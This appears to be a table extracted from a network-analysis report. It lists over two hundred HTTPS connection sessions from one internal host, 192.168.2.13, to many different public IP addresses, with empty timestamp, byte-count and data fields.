                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21482192.168.2.13581242.157.100.73443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21483192.168.2.1355940136.203.93.26443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21484192.168.2.1341058103.146.254.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21485192.168.2.1335890182.204.239.160443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21486192.168.2.1343062213.80.104.197443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21487192.168.2.1336528118.139.31.213443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21488192.168.2.134234892.90.64.138443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21489192.168.2.134756480.9.199.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21490192.168.2.133953825.49.236.43443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21491192.168.2.1341020146.91.47.0443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21492192.168.2.134586032.151.188.37443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21493192.168.2.134045431.35.208.105443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21494192.168.2.133806847.245.98.236443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21495192.168.2.1351496222.28.9.223443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21496192.168.2.1337274135.236.144.58443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21497192.168.2.134447688.119.241.210443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21498192.168.2.1355928190.69.76.171443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21499192.168.2.135023271.95.62.193443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21500192.168.2.1334944190.98.8.198443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21501192.168.2.134786864.1.78.73443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21502192.168.2.135428820.23.13.112443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21503192.168.2.134096676.71.78.66443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21504192.168.2.1357532140.57.27.3443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21505192.168.2.1344350174.123.228.208443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21506192.168.2.1360204137.100.55.160443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21507192.168.2.1343086125.240.26.178443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21508192.168.2.135350473.245.173.4443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21509192.168.2.135189047.193.205.151443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21510192.168.2.1349294218.84.165.82443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21511192.168.2.1342090151.99.41.132443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21512192.168.2.1337814113.107.77.11443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21513192.168.2.133615663.14.243.25443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21514192.168.2.1348162210.109.101.189443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21515192.168.2.1340596152.106.148.80443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21516192.168.2.134581697.77.170.125443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21517192.168.2.135413462.55.110.228443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21518192.168.2.1348198108.24.106.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21519192.168.2.1334524168.131.194.189443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21520192.168.2.1344466211.14.95.35443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21521192.168.2.1336772219.196.115.125443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21522192.168.2.133666889.103.181.227443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21523192.168.2.1357598177.103.237.250443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21524192.168.2.134275035.84.35.229443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21525192.168.2.1344550185.188.110.148443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21526192.168.2.136032647.222.57.12443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21527192.168.2.135258864.129.96.64443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21528192.168.2.133859899.69.191.164443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21529192.168.2.1347868113.69.127.18443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21530192.168.2.1344156152.168.128.53443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21531192.168.2.1356636139.112.192.76443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21532192.168.2.1333462101.118.85.68443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21533192.168.2.134463878.145.47.209443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21534192.168.2.1333324146.97.108.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21535192.168.2.1334744143.193.136.246443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21536192.168.2.1351558105.1.239.84443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21537192.168.2.1333122146.251.68.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21538192.168.2.1358366156.226.131.39443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21539192.168.2.1353934192.112.81.78443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21540192.168.2.1334434145.125.97.250443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21541192.168.2.134256842.170.244.57443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21542192.168.2.1346136181.78.17.138443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21543192.168.2.1337486154.240.209.183443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21544192.168.2.1338838191.218.189.243443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21545192.168.2.1337434210.71.103.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21546192.168.2.1332792163.234.123.49443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21547192.168.2.13333265.158.207.22443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21548192.168.2.1336670175.167.250.236443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21549192.168.2.135712447.27.178.155443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21550192.168.2.1349532115.77.122.115443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21551192.168.2.1357348186.82.85.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21552192.168.2.1335020138.57.235.124443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21553192.168.2.1353078198.232.124.119443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21554192.168.2.135396849.23.19.80443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21555192.168.2.1357916143.144.80.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21556192.168.2.1337300108.199.103.130443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21557192.168.2.135520258.146.131.32443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21558192.168.2.1350654191.174.201.60443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21559192.168.2.134205635.153.39.184443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21560192.168.2.1349478191.10.97.78443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21561192.168.2.1346202143.178.6.0443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21562192.168.2.135135291.237.246.239443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21563192.168.2.1335038135.17.189.30443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21564192.168.2.134456638.114.148.19443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21565192.168.2.1347912107.36.132.216443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21566192.168.2.1335962200.152.135.68443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21567192.168.2.13411828.178.160.119443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21568192.168.2.134280238.135.60.120443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21569192.168.2.1345646132.225.118.204443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21570192.168.2.135837859.125.72.51443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21571192.168.2.1347010122.76.144.5443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21572192.168.2.1358566169.59.59.111443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21573192.168.2.1354234103.228.91.16443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21574192.168.2.1349384198.252.27.52443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21575192.168.2.135190647.119.252.237443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21576192.168.2.1352942111.217.8.135443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21577192.168.2.1338664116.237.130.32443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21578192.168.2.1345130193.147.149.18443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21579192.168.2.1344000114.81.32.220443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21580192.168.2.1347628124.34.91.20443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21581192.168.2.134879853.246.90.126443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21582192.168.2.134538812.159.83.127443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21583192.168.2.1349882177.113.30.107443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21584192.168.2.1352140164.145.212.53443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21585192.168.2.1335710107.109.158.110443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21586192.168.2.134788039.247.247.50443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21587192.168.2.1360432217.247.155.241443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21588192.168.2.1350186160.187.102.39443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21589192.168.2.133348023.110.187.252443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21590192.168.2.1336018180.108.76.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21591192.168.2.1334804182.232.52.27443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21592192.168.2.1346582186.214.12.186443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21593192.168.2.1342072154.35.149.182443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21594192.168.2.1346736106.176.214.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21595192.168.2.1340086103.10.200.253443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21596192.168.2.133382846.89.150.12443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21597192.168.2.134679095.138.157.160443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21598192.168.2.134818683.31.107.163443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21599192.168.2.1357500132.204.146.43443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21600192.168.2.133537637.76.107.158443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21601192.168.2.1357122161.149.55.207443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21602192.168.2.1354352148.155.37.100443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21603192.168.2.134470467.79.42.129443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21604192.168.2.1342726102.214.129.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21605192.168.2.133970240.208.152.13443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21606192.168.2.1343644189.193.248.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21607192.168.2.1360508106.234.242.129443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21608192.168.2.1354336165.143.225.99443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21609192.168.2.1359778177.23.42.246443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21610192.168.2.1353150164.171.255.191443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21611192.168.2.1356718133.169.149.128443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21612192.168.2.1343546218.253.170.46443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21613192.168.2.1353930141.119.210.0443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21614192.168.2.1337408104.161.84.67443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21615192.168.2.135009824.230.194.204443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21616192.168.2.1354400144.30.24.94443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21617192.168.2.134268049.84.144.13443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21618192.168.2.1333162113.98.112.152443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21619192.168.2.1359530171.243.12.149443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21620192.168.2.135530086.231.237.13443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21621192.168.2.1356708198.105.212.32443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21622192.168.2.134918088.246.78.38443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21623192.168.2.1349326193.138.149.230443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21624192.168.2.1339066220.57.93.223443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21625192.168.2.1359998139.45.226.192443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21626192.168.2.1360776112.141.152.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21627192.168.2.1337438104.149.140.150443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21628192.168.2.1333608112.36.121.184443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21629192.168.2.1357256177.98.145.198443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21630192.168.2.1356080182.170.32.187443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21631192.168.2.1342338195.128.9.230443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21632192.168.2.1335004209.172.38.206443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21633192.168.2.133407058.128.3.43443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21634192.168.2.1334660154.55.254.173443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21635192.168.2.1346350110.244.24.151443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21636192.168.2.133742675.183.242.183443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21637192.168.2.1336616180.150.105.42443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21638192.168.2.1348886111.225.30.131443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21639192.168.2.1337452206.98.121.138443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21640192.168.2.1356968219.119.248.253443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21641192.168.2.1335050120.150.196.10443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21642192.168.2.134141294.129.121.16443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21643192.168.2.1336772166.106.26.40443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21644192.168.2.1343344158.180.41.63443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21645192.168.2.1347606188.67.7.36443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21646192.168.2.1338618123.219.135.18443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21647192.168.2.136079677.80.3.37443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21648192.168.2.1336674151.229.44.173443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21649192.168.2.133768249.254.50.60443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21650192.168.2.1351530148.19.32.246443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21651192.168.2.133618475.254.232.151443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21652192.168.2.135799632.96.74.82443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21653192.168.2.133486838.147.90.188443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21654192.168.2.133403877.51.107.26443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21655192.168.2.135274025.156.70.140443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21656192.168.2.1344060200.222.129.68443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21657192.168.2.133609880.241.38.52443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21658192.168.2.1357482128.57.32.108443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21659192.168.2.1360332110.38.38.125443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21660192.168.2.1352410146.6.238.182443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21661192.168.2.133865819.106.171.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21662192.168.2.135049624.231.63.168443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21663192.168.2.1345720120.65.126.46443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21664192.168.2.1341826149.28.72.10443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21665192.168.2.135748847.130.26.194443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21666192.168.2.135247018.58.94.145443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21667192.168.2.1338702139.82.33.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21668192.168.2.134187088.52.239.229443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21669192.168.2.1360022174.173.174.157443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21670192.168.2.1354104210.166.200.244443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21671192.168.2.1334084204.30.32.176443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21672192.168.2.135719087.183.117.17443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21673192.168.2.135963497.191.84.0443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21674192.168.2.133349457.229.3.222443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21675192.168.2.1359144187.92.4.91443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21676192.168.2.134237854.66.70.174443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21677192.168.2.1350522137.179.242.140443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21678192.168.2.1341134102.53.94.182443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21679192.168.2.133685451.79.144.195443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21680192.168.2.1333228144.166.54.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21681192.168.2.1343086170.85.227.138443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21682192.168.2.1340170222.253.38.202443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21683192.168.2.1352118175.164.232.55443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21684192.168.2.1343644158.224.84.8443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21685192.168.2.133405284.113.43.91443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21686192.168.2.1335066195.132.154.190443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21687192.168.2.1351742192.84.114.155443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21688192.168.2.1353092221.235.205.206443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21689192.168.2.1355038141.226.225.191443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21690192.168.2.1340378118.139.47.248443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21691192.168.2.1348112138.149.102.75443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21692192.168.2.1337860218.41.237.74443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21693192.168.2.134921276.11.48.209443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21694192.168.2.134107092.109.114.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21695192.168.2.135660640.98.28.101443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21696192.168.2.135926047.26.190.143443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21697192.168.2.135244473.124.33.46443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21698192.168.2.1345196162.196.141.119443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21699192.168.2.133583051.66.9.168443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21700192.168.2.133763486.208.132.87443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21701192.168.2.1355612119.248.70.69443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21702192.168.2.136051477.13.200.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21703192.168.2.1336412164.105.182.227443
